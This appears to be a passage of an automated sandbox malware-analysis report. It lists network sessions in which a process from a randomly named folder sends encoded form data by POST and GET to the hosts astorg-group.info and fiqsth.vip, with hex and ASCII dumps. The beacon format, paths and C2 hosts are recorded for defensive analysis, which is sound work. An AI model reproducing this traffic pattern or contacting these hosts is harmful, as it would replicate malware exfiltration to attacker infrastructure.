                                                                                        25 | 192.168.2.8 | 49733 | 217.70.184.50 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:01:16.387243032 CET | 648 | OUT | POST /vdvc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.astorg-group.info
                                                                                        Origin: http://www.astorg-group.info
                                                                                        Referer: http://www.astorg-group.info/vdvc/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 46 38 66 61 4d 5a 69 54 77 76 6e 59 51 53 2f 61 7a 72 6c 46 4f 7a 70 50 67 71 31 73 5a 2b 4c 7a 43 67 63 46 2f 63 6c 4b 53 58 70 4c 37 4d 69 48 4f 36 51 32 77 63 32 4b 62 65 73 44 63 64 57 6c 39 64 4d 6c 69 75 4b 4b 52 50 64 71 58 4a 45 57 44 64 63 51 62 79 56 69 59 41 2b 42 44 4a 6c 4c 46 35 61 4f 6e 67 78 35 4a 4c 4c 69 72 65 64 75 2f 4f 30 54 51 48 41 33 6e 67 73 73 47 7a 2f 43 44 64 79 54 71 52 6c 35 35 45 4f 56 75 67 5a 68 70 41 79 6e 75 47 4c 6b 68 7a 6b 55 66 54 51 53 66 71 44 4a 2b 41 6b 38 67 79 4e 31 79 5a 45 72 30 71 47 73 49 4e 66 66 2f 6a 63 3d
                                                                                        Data Ascii: A60d=0O14lEhnQB07F8faMZiTwvnYQS/azrlFOzpPgq1sZ+LzCgcF/clKSXpL7MiHO6Q2wc2KbesDcdWl9dMliuKKRPdqXJEWDdcQbyViYA+BDJlLF5aOngx5JLLiredu/O0TQHA3ngssGz/CDdyTqRl55EOVugZhpAynuGLkhzkUfTQSfqDJ+Ak8gyN1yZEr0qGsINff/jc=
                                                                                        Nov 6, 2024 16:01:17.197098017 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:01:17 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        26 | 192.168.2.8 | 49734 | 217.70.184.50 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:01:18.954898119 CET | 668 | OUT | POST /vdvc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.astorg-group.info
                                                                                        Origin: http://www.astorg-group.info
                                                                                        Referer: http://www.astorg-group.info/vdvc/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 49 7a 7a 4d 68 73 46 77 35 4a 4b 52 58 70 4c 6a 63 69 43 54 4b 51 6f 77 63 36 34 62 61 6b 44 63 5a 32 6c 39 59 77 6c 6a 5a 2b 4c 52 66 64 53 4d 5a 46 77 64 74 63 51 62 79 56 69 59 41 36 37 44 4a 39 4c 45 4a 4b 4f 6d 43 5a 36 45 72 4c 6a 73 65 64 75 79 75 30 58 51 48 41 46 6e 68 41 47 47 78 33 43 44 59 57 54 72 44 4e 36 77 45 4f 54 68 41 59 71 34 51 62 39 6a 56 54 32 70 56 34 59 42 79 59 73 61 63 79 6a 6b 69 73 36 6a 79 6c 65 79 61 73 64 78 64 62 45 53 75 50 76 68 30 4c 73 45 44 55 6f 59 75 76 39 74 51 78 36 65 30 6b 4b 6e 32 64 64
                                                                                        Data Ascii: A60d=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZIzzMhsFw5JKRXpLjciCTKQowc64bakDcZ2l9YwljZ+LRfdSMZFwdtcQbyViYA67DJ9LEJKOmCZ6ErLjseduyu0XQHAFnhAGGx3CDYWTrDN6wEOThAYq4Qb9jVT2pV4YByYsacyjkis6jyleyasdxdbESuPvh0LsEDUoYuv9tQx6e0kKn2dd
                                                                                         Nov 6, 2024 16:01:19.766999960 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:01:19 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         27 | 192.168.2.8 | 49735 | 217.70.184.50 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:01:21.504544020 CET | 1685 | OUT | POST /vdvc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.astorg-group.info
                                                                                        Origin: http://www.astorg-group.info
                                                                                        Referer: http://www.astorg-group.info/vdvc/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 4c 54 7a 4d 53 30 46 78 61 78 4b 51 58 70 4c 39 4d 69 44 54 4b 52 30 77 59 57 38 62 61 6f 54 63 66 36 6c 39 2b 6b 6c 79 63 53 4c 66 66 64 53 54 4a 46 6b 44 64 63 4a 62 30 31 63 59 41 71 37 44 4a 39 4c 45 50 4f 4f 79 67 78 36 43 72 4c 69 72 65 64 55 2f 4f 30 76 51 45 78 79 6e 68 30 38 47 41 58 43 43 34 47 54 70 32 35 36 2f 45 4f 52 6b 41 5a 71 34 51 47 6a 6a 56 66 74 70 56 6c 33 42 31 55 73 59 71 7a 6b 2f 68 77 43 67 41 42 66 32 63 55 56 31 63 76 36 58 6f 7a 39 6d 6a 33 39 47 30 67 59 64 74 66 68 2f 41 6f 4e 4d 56 38 2b 70 6a 74 51 37 45 2b 78 51 48 42 74 43 78 67 31 47 36 52 48 64 63 34 34 48 32 34 6c 31 57 46 44 47 49 6f 4b 68 57 59 38 74 63 66 53 33 35 4e 32 4b 55 66 74 6c 33 64 6a 2f 34 63 41 50 7a 75 30 37 38 6d 34 39 63 6e 6a 72 69 4b 77 43 77 75 7a 4f 77 2b 61 36 32 6a 51 34 39 42 48 59 70 48 58 59 32 49 4a 74 61 6b 50 59 74 5a 52 47 54 2b 2b 6f 48 41 6c 32 [TRUNCATED]
                                                                                        Data Ascii: A60d=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 [TRUNCATED]
                                                                                         Nov 6, 2024 16:01:22.318883896 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:01:22 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         28 | 192.168.2.8 | 49736 | 217.70.184.50 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:01:24.048579931 CET | 383 | OUT | GET /vdvc/?A60d=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczReOZAYqscKe8aXj18ECqhEbYKMceViC9DOJ/t3u5W+eFfLA==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.astorg-group.info
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                         Nov 6, 2024 16:01:24.861299992 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:01:24 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Language
                                                                                        Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 61 73 74 6f 72 67 2d 67 72 6f 75 70 2e 69 6e 66 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 [TRUNCATED]
                                                                                        Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>astorg-group.info</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
                                                                                         Nov 6, 2024 16:01:24.861321926 CET | 914 | IN | Data Raw: 3d 61 73 74 6f 72 67 2d 67 72 6f 75 70 2e 69 6e 66 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 61 73 74 6f 72 67 2d 67 72 6f 75 70 2e 69 6e 66 6f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f
                                                                                        Data Ascii: =astorg-group.info"><strong>View the WHOIS results of astorg-group.info</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         29 | 192.168.2.8 | 49737 | 3.33.130.190 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:01:30.023247957 CET | 627 | OUT | POST /0m8a/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.fiqsth.vip
                                                                                        Origin: http://www.fiqsth.vip
                                                                                        Referer: http://www.fiqsth.vip/0m8a/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 47 61 55 67 7a 4b 50 54 45 61 53 70 58 45 33 66 43 51 54 4a 78 68 62 67 31 46 6b 55 41 4c 4d 63 39 44 2f 34 4b 4b 74 7a 4c 76 71 6e 6d 35 5a 4e 55 50 35 38 61 6a 4e 4e 61 72 73 62 4b 36 51 42 2b 7a 6b 67 37 2f 31 70 76 34 7a 63 6b 2f 42 51 62 35 39 42 79 78 4e 50 79 37 51 63 66 33 70 76 4e 49 2f 54 5a 37 53 39 47 33 7a 51 47 49 54 45 33 4d 79 53 50 36 35 76 52 77 66 30 62 4b 38 62 35 56 66 48 2f 70 4a 2f 6c 74 61 49 6c 6f 4e 4b 58 5a 66 4e 59 77 68 59 73 34 35 32 34 56 34 47 33 4b 63 71 37 43 5a 58 42 49 46 39 77 6f 30 30 4b 6b 6e 6d 30 54 68 62 58 51 51 3d
                                                                                        Data Ascii: A60d=t1cnTZ5xaz4ZGaUgzKPTEaSpXE3fCQTJxhbg1FkUALMc9D/4KKtzLvqnm5ZNUP58ajNNarsbK6QB+zkg7/1pv4zck/BQb59ByxNPy7Qcf3pvNI/TZ7S9G3zQGITE3MySP65vRwf0bK8b5VfH/pJ/ltaIloNKXZfNYwhYs4524V4G3Kcq7CZXBIF9wo00Kknm0ThbXQQ=


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         30 | 192.168.2.8 | 49738 | 3.33.130.190 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:01:32.569741011 CET | 647 | OUT | POST /0m8a/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.fiqsth.vip
                                                                                        Origin: http://www.fiqsth.vip
                                                                                        Referer: http://www.fiqsth.vip/0m8a/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 48 36 45 67 2b 4a 6e 54 43 36 53 71 4a 30 33 66 4c 77 54 4e 78 68 58 67 31 45 67 45 41 5a 6f 63 2b 69 50 34 4a 4c 74 7a 4d 76 71 6e 2b 4a 5a 45 51 50 35 4e 61 6a 78 46 61 70 49 62 4b 36 45 42 2b 7a 30 67 34 49 68 71 75 6f 7a 61 76 66 42 6f 55 5a 39 42 79 78 4e 50 79 37 45 69 66 78 42 76 4e 38 37 54 66 76 47 2b 59 6e 7a 54 50 6f 54 45 7a 4d 79 57 50 36 35 42 52 30 2f 65 62 4d 34 62 35 55 76 48 2b 34 4a 2b 71 74 61 4f 34 34 4d 6c 45 4a 69 68 5a 53 64 76 6b 59 70 57 2b 48 73 69 37 63 74 41 68 67 52 52 43 49 74 57 77 72 63 43 50 54 36 4f 75 77 78 72 4a 48 48 7a 63 73 6a 6b 71 66 65 54 41 39 2f 4b 4c 6e 68 41 56 78 41 75
                                                                                        Data Ascii: A60d=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZoc+iP4JLtzMvqn+JZEQP5NajxFapIbK6EB+z0g4IhquozavfBoUZ9ByxNPy7EifxBvN87TfvG+YnzTPoTEzMyWP65BR0/ebM4b5UvH+4J+qtaO44MlEJihZSdvkYpW+Hsi7ctAhgRRCItWwrcCPT6OuwxrJHHzcsjkqfeTA9/KLnhAVxAu


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         31 | 192.168.2.8 | 49739 | 3.33.130.190 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:01:35.112355947 CET | 1664 | OUT | POST /0m8a/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.fiqsth.vip
                                                                                        Origin: http://www.fiqsth.vip
                                                                                        Referer: http://www.fiqsth.vip/0m8a/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 48 36 45 67 2b 4a 6e 54 43 36 53 71 4a 30 33 66 4c 77 54 4e 78 68 58 67 31 45 67 45 41 5a 67 63 2b 56 6e 34 54 6f 46 7a 4e 76 71 6e 67 35 5a 4a 51 50 35 51 61 6e 64 42 61 70 31 35 4b 34 38 42 34 56 34 67 35 38 4e 71 6b 6f 7a 61 67 2f 42 54 62 35 39 75 79 78 64 4c 79 37 55 69 66 78 42 76 4e 36 58 54 4a 4c 53 2b 61 6e 7a 51 47 49 54 51 33 4d 79 79 50 36 78 33 52 30 36 72 62 38 59 62 2b 30 2f 48 79 71 78 2b 6a 74 61 4d 37 34 4d 39 45 4a 75 2b 5a 53 42 6a 6b 62 31 77 2b 46 4d 69 2b 49 73 48 38 68 55 48 59 5a 4e 6e 39 61 34 59 58 68 43 63 6d 78 6c 2b 47 45 2f 70 66 73 6d 50 6e 66 48 48 43 64 47 48 63 52 56 76 53 31 70 59 55 47 64 4a 61 31 42 41 37 35 2b 69 6d 37 51 50 68 5a 41 4f 52 53 73 47 46 45 61 67 73 5a 51 44 31 6e 4c 46 6b 73 65 6d 41 48 5a 48 48 72 30 64 6e 36 43 46 75 41 57 62 42 4e 37 41 57 47 6a 65 6b 66 68 49 67 33 6c 72 50 4d 6c 70 51 65 31 6d 4b 6a 31 44 72 46 70 54 38 50 79 42 45 4b 7a 43 76 7a 68 38 79 46 6b 74 48 7a 61 64 53 4b 66 43 70 [TRUNCATED]
                                                                                        Data Ascii: A60d=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 [TRUNCATED]


                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                         32 | 192.168.2.8 | 49740 | 3.33.130.190 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:01:37.665546894 CET | 376 | OUT | GET /0m8a/?A60d=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp7faj8lfUqZu5U5j35YEbCksI5bqMK6zFCmtbYf508vfTQ==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.fiqsth.vip
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                         Nov 6, 2024 16:01:38.300812960 CET | 406 | IN | HTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 06 Nov 2024 15:01:38 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 266
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 36 30 64 3d 67 33 30 48 51 70 64 2b 48 67 4d 78 46 4f 73 76 79 34 66 42 44 34 65 50 44 47 2b 78 53 41 66 4c 6f 68 47 31 32 56 78 2b 57 4d 59 6a 2b 77 4b 41 52 4a 74 62 63 4f 43 77 6f 70 4e 77 41 74 74 79 4f 53 4e 33 58 36 6b 36 53 36 6f 44 32 7a 30 2b 2f 39 64 41 70 37 66 61 6a 38 6c 66 55 71 5a 75 35 55 35 6a 33 35 59 45 62 43 6b 73 49 35 62 71 4d 4b 36 7a 46 43 6d 74 62 59 66 35 30 38 76 66 54 51 3d 3d 26 51 66 74 6c 5a 3d 43 6e 61 50 67 38 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
